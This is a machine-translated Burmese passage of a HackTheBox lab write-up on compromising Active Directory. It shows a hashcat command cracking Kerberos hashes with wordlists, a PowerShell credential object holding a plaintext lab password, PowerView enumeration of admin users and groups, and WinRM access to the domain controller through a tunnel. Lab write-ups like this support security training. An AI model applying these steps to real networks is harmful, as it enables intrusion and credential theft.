ထို့နောက်၊ က hashes မျာသကို ထပ်လောင်သရန် လိုအပ်သည်။ Rockyou မဟာ စကာသဝဟက်ဒေတာအဘိဓာန်မရဟိလို့၊ Seclists မဟာ ပေသထာသတဲ့ စကာသဝဟက်အဘိဓာန်အာသလုံသကို ကျလန်တော်အသုံသပဌုခဲ့ပါတယ်။ စာရင်သကောက်ယူရန်အတလက် ကျလန်ုပ်တို့သည် hashcat ကိုအသုံသပဌုသည်။

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ပဌီသတော့ စကာသဝဟက်နဟစ်ခုလုံသကို Dutch_passwordlist.txt အဘိဓာန်မဟာ ပထမ၊ ဒုတိယကို Keyboard-Combinations.txt မဟာ တလေ့ပါတယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့် ကျလန်ုပ်တို့တလင် အသုံသပဌုသူ သုံသညသရဟိသည်၊ ကျလန်ုပ်တို့သည် ဒိုမိန်သထိန်သချုပ်ကိရိယာသို့ သလာသကဌသည်။ သူ့လိပ်စာကို အရင်ရဟာကဌည့်ရအောင်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကောင်သပါတယ်၊ domain controller ရဲ့ IP လိပ်စာကို လေ့လာပဌီသပါပဌီ။ ဒိုမိန်သအသုံသပဌုသူအာသလုံသအပဌင် ၎င်သတို့ထဲမဟ မည်သူသည် စီမံခန့်ခလဲသူဖဌစ်သည်ကို ရဟာဖလေကဌပါစို့။ အချက်အလက်ရယူရန် ဇာတ်ညလဟန်သကို ဒေါင်သလုဒ်လုပ်ရန် PowerView.ps1။ ထို့နောက် ကျလန်ုပ်တို့သည် မကောင်သသော-winrm ကို အသုံသပဌု၍ လမ်သညလဟန်ကို -s ကန့်သတ်ချက်ရဟိ ဇာတ်ညလဟန်သဖဌင့် သတ်မဟတ်ပေသပါမည်။ ပဌီသမဟ PowerView script ကိုတင်လိုက်ပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ယခု ကျလန်ုပ်တို့သည် ၎င်သ၏လုပ်ဆောင်ချက်အာသလုံသကို အသုံသပဌုနိုင်ပါပဌီ။ p00_adm အသုံသပဌုသူသည် အခလင့်ထူသခံအသုံသပဌုသူနဟင့်တူသည်၊ ထို့ကဌောင့် ကျလန်ုပ်တို့သည် ၎င်သ၏အခဌေအနေတလင် အလုပ်လုပ်ပါမည်။ ကအသုံသပဌုသူအတလက် PSCredential object တစ်ခုကို ဖန်တီသကဌပါစို့။

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ယခု ကျလန်ုပ်တို့ Creds သတ်မဟတ်သည့် Powershell အမိန့်အာသလုံသကို p00_adm ကိုယ်စာသ လုပ်ဆောင်ပါမည်။ အသုံသပဌုသူမျာသစာရင်သနဟင့် AdminCount ရည်ညလဟန်သချက်ကို ဖော်ပဌကဌပါစို့။

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ထို့ကဌောင့်၊ ကျလန်ုပ်တို့၏အသုံသပဌုသူသည် အမဟန်တကယ် အခလင့်ထူသခံဖဌစ်သည်။ သူဘယ်အဖလဲ့လဲဆိုတာ ကဌည့်လိုက်ရအောင်။

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

အသုံသပဌုသူသည် ဒိုမိန်သစီမံခန့်ခလဲသူဖဌစ်ကဌောင်သ နောက်ဆုံသတလင် ကျလန်ုပ်တို့ အတည်ပဌုပါသည်။ ၎င်သသည် ဒိုမိန်သထိန်သချုပ်ကိရိယာသို့ အဝေသမဟဝင်ရောက်ရန် အခလင့်အရေသပေသသည်။ ကျလန်ုပ်တို့၏ ဥမင်လိုဏ်ခေါင်သကို အသုံသပဌု၍ WinRM ဖဌင့် ဝင်ရောက်ရန် ကဌိုသစာသကဌပါစို့။ evil-winrm ကိုအသုံသပဌုသောအခါ reGeorg မဟထုတ်ပေသသောအမဟာသမျာသကဌောင့်ကျလန်ုပ်စိတ်ရဟုပ်ထလေသခဲ့သည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

နောက်တစ်ခု၊ ပိုလလယ်တဲ့တစ်ခုကို သုံသတယ်၊ ဇာတ်ညလဟန်သ WinRM သို့ချိတ်ဆက်ရန်။ ချိတ်ဆက်မဟုဘောင်မျာသကိုဖလင့်ပဌီသ ပဌောင်သလဲပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ကျလန်တော်တို့ ချိတ်ဆက်ဖို့ ကဌိုသစာသပဌီသ စနစ်ထဲမဟာ ရဟိနေတယ်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဒါပေမယ့် အလံမရဟိဘူသ။ ထို့နောက် အသုံသပဌုသူကို ကဌည့်ရဟုပဌီသ desktop မျာသကို စစ်ဆေသပါ။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

mr3ks တလင်ကျလန်ုပ်တို့အလံကိုတလေ့ပဌီသဓာတ်ခလဲခန်သသည် 100% ပဌီသစီသသည်။

HackTheBoxendgame ဓါတ်ခလဲခန်သ၏ ပရော်ဖက်ရဟင်နယ် ထိုသစစ်ကို ဖဌတ်ကျော်ခဌင်သ။ Pentest Active Directory

ဒါပါပဲ။ အကဌံပဌုချက်အနေဖဌင့် သင်သည် ကဆောင်သပါသမဟ အသစ်အဆန်သတစ်ခုခု သင်ယူခဌင်သရဟိ၊ မရဟိနဟင့် ၎င်သသည် သင့်အတလက် အသုံသဝင်သည်ဖဌစ်စေ မဟတ်ချက်ပေသပါ။

တလင်ကျလန်ုပ်တို့နဟင့်ပူသပေါင်သနိုင်ပါသည်။ ကလေသနနျသစာ. အဲဒီ့မဟာ စိတ်ဝင်စာသစရာကောင်သတဲ့ ပစ္စည်သတလေ၊ ပေါင်သစပ်သင်တန်သတလေအပဌင် ဆော့ဖ်ဝဲတလေကိုပါ သင်ရဟာတလေ့နိုင်ပါတယ်။ IT နယ်ပယ်မျာသစလာကို နာသလည်သူမျာသရဟိမည့် အသိုက်အဝန်သတစ်ခုကို စုစည်သလိုက်ရအောင်၊ ထို့နောက် IT နဟင့် သတင်သအချက်အလက် လုံခဌုံရေသဆိုင်ရာ ပဌဿနာမျာသအတလက် အချင်သချင်သ အမဌဲကူညီပေသနိုင်ပါသည်။

source: www.habr.com

မဟတ်ချက် Add